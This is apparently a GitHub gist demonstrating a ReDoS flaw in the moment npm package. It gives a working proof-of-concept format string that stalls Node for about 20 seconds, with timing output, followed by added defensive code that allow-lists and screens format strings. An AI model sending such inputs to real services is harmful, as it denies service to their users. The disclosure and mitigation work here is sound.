@grnd
Last active November 19, 2018 15:02
PoC for ReDoS in `moment` npm package

Details here: https://snyk.io/vuln/npm:moment:20161019

It takes just a 40-character string to block the event loop for about 20 seconds on a standard laptop, and each additional space character doubles that time.

Example: moment-test.js

var m = require("moment");
// select the Belarusian ("be") locale
m.locale("be");
// the 40-character format string: one letter, a long run of spaces, then "MMN MMMM"
m().format("D                               MMN MMMM");

$ time node moment-test.js
21.24s user 0.14s system 96% cpu 22.079 total
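As an added example (not part of the gist and not moment's own code), the following shows how a service can treat a date-format string as untrusted input before it reaches moment().format(). The names NAMED_FORMATS, resolveNamedFormat, rejectReason, formatUntrusted and the limits they use are assumptions for illustration; POC_FORMAT is the gist's 40-character input rebuilt in code, and fakeFormat stands in for moment so the file runs without the package installed.

```javascript
// Added example, not part of the gist: treating a date-format string as
// untrusted input before it reaches moment().format(). Names and limits
// below are assumptions for illustration, not moment's own API.

// Preferred mitigation: never accept a free-form format string from a
// client. Map a small set of names to formats the application controls.
const NAMED_FORMATS = {
  iso: "YYYY-MM-DD",
  long: "MMMM D, YYYY",
  time: "HH:mm:ss",
};

// Resolves a client-supplied name to an allow-listed format, or the fallback.
// hasOwnProperty keeps names like "__proto__" from reaching the prototype.
function resolveNamedFormat(name, fallback = NAMED_FORMATS.iso) {
  return Object.prototype.hasOwnProperty.call(NAMED_FORMATS, name)
    ? NAMED_FORMATS[name]
    : fallback;
}

// Fallback heuristic for code paths that must accept free-form formats.
// Limits are assumed values; tune them to the formats you actually emit.
const MAX_FORMAT_LENGTH = 32;  // the gist's input is 40 characters
const MAX_SPACE_RUN = 1;       // the gist reports the time doubling per extra space
const FORMAT_ALPHABET = /^[A-Za-z0-9 \-:.,\/\[\]]*$/;

// Returns null if fmt is accepted, otherwise a short reason string.
function rejectReason(fmt) {
  if (typeof fmt !== "string") return "not a string";
  if (fmt.length > MAX_FORMAT_LENGTH) return "too long";
  if (!FORMAT_ALPHABET.test(fmt)) return "disallowed characters";
  let run = 0;
  for (const ch of fmt) {
    run = ch === " " ? run + 1 : 0;
    if (run > MAX_SPACE_RUN) return "whitespace run";
  }
  return null;
}

// Wraps any formatter that takes a format string, for example
// (f) => moment().format(f). The check runs before the call because a
// synchronous regex match cannot be interrupted once it has started; the
// timer only records, after the fact, how long the call took.
function formatUntrusted(formatFn, fmt, { fallback = NAMED_FORMATS.iso, budgetMs = 50 } = {}) {
  const reason = rejectReason(fmt);
  const chosen = reason === null ? fmt : fallback;
  const start = process.hrtime.bigint();
  const output = formatFn(chosen);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  if (elapsedMs > budgetMs) {
    console.warn(`format "${chosen}" took ${elapsedMs.toFixed(1)} ms, over the ${budgetMs} ms budget`);
  }
  return { output, format: chosen, rejected: reason, elapsedMs };
}

// Constructed sample: the gist's 40-character input (1 letter, 31 spaces, "MMN MMMM").
const POC_FORMAT = "D" + " ".repeat(31) + "MMN MMMM";

// Stand-in formatter so the example runs without moment installed.
// In a real service this would be (f) => require("moment")().format(f).
const fakeFormat = (f) => `formatted:${f}`;

console.log(formatUntrusted(fakeFormat, POC_FORMAT));      // rejected: "too long", fallback used
console.log(formatUntrusted(fakeFormat, "MMMM D, YYYY"));  // rejected: null
```

The allow-list is the mitigation to reach for; the heuristic guard only rejects inputs shaped like the one on this page (long, or containing runs of spaces) and is not evidence that other format strings are harmless, so updating moment as described in the linked advisory remains the actual fix. The elapsed-time field is there for logging and alerting on slow calls, not for stopping them: once a backtracking regex is running on the event loop, nothing in JavaScript can pre-empt it.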